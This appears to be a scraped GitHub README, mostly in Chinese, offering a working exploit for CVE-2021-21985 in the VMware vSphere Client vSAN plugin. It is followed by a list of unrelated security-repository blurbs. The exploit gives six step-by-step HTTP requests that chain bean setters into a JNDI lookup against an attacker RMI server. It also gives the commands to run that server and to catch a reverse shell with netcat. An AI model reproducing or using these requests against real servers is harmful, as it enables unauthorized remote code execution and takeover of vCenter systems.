cve-2021-21985 exploit

0x01 漏洞点

分析可见：

https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985?referrer=home#rapid7-analysis

0x02 exploit

对beans对象进行重新构造，实现rce。

bean列表：

localizedMessageBundle
vsanWorkerThreadFactory
vsanThreadPoolImpl
vsanServiceBundleActivator
vsanServiceFactory
vsanProviderUtils_setVmodlHelper
vsanProviderUtils_setVsanServiceFactory
vsanQueryUtil_setDataService
vsanComponentsProviderImpl
capabilityPropertyProviderImpl
pbmDataProviderImpl
vsanCapabilityCacheManager
vsanCapabilityUtils_setVsanCapabilityCacheManager
vsanUtils_setMessageBundle
vsanFormatUtils_setUserSessionService

随风大佬使用的vsanProviderUtils_setVmodlHelper在我这边环境没测试成功，就选用了另外的bean进行测试，由于Vsphere UI使用的tomcat中间件，可以通过jndi rmi bypass(https://github.com/welk1n/JNDI-Injection-Bypass/blob/master/src/main/java/payloads/EvilRMIServer.java）远程执行命令。

Step1
https://host/ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService/setTargetObject
{"methodInput":[null]}


Step2
https://host/ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService/setStaticMethod
{"methodInput":["javax.naming.InitialContext.doLookup"]}

Step3
https://host/ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService/setTargetMethod
{"methodInput":["doLookup"]}

Step4 
https://host/ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService/setArguments
{"methodInput":[["rmi://attip:1097/ExecByEL"]]}

Step5
https://host/ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService/prepare
{"methodInput":[]}

Step6
https://host/ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService/invoke
{"methodInput":[]}

0x03 使用方法

启动rmi服务 java -cp JNDI-Injection-Bypass-1.0-SNAPSHOT-all.jar payloads.EvilRMIServer attip
启动reverse shell 侦听

nc -lvvp 5555

执行以上payload，得到reverse shell

cve-2021-21985 exploit

Related tags

Overview

cve-2021-21985 exploit

0x01 漏洞点

0x02 exploit

0x03 使用方法

0x04 reference

Owner

xnianq

Bypass's HCaptcha by overloading their api causing it to throwback a generated uuid. (Released due to exposure)

A BurpSuite extension to parse 5GC NF OpenAPI 3.0 files to assess 5G core networks

pwncat module that automatically exploits CVE-2021-4034 (pwnkit)

This is tools hacking for scan vuln in port web, happy using

Confluence OGNL injection

A Static Analysis Tool for Detecting Security Vulnerabilities in Python Web Applications

A high-performance DNS stub resolver for bulk lookups and reconnaissance (subdomain enumeration)

Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user

version de mi tool de kali linux para miertuxzzzz digo, termux >:)

Northwave Log4j CVE-2021-44228 checker

CVE-2021-43798Exp多线程批量验证脚本

Repository for a project of the course EP2520 Building Networked Systems Security

Sqli-Scanner is a python3 script written to scan websites for SQL injection vulnerabilities

Linus-png.github.io - Versionsverwaltung & Open Source Hausaufgabe

Deobfuscate Log4Shell payloads with ease

PassLock is a medium-security password manager that encrypts passwords using Advanced Encryption Standards (AES)

Make files with as many random bytes as you want

Find exposed API keys based on RegEx and get exploitation methods for some of keys that are found

The self-hostable proxy tunnel

Moodle community-based vulnerability scanner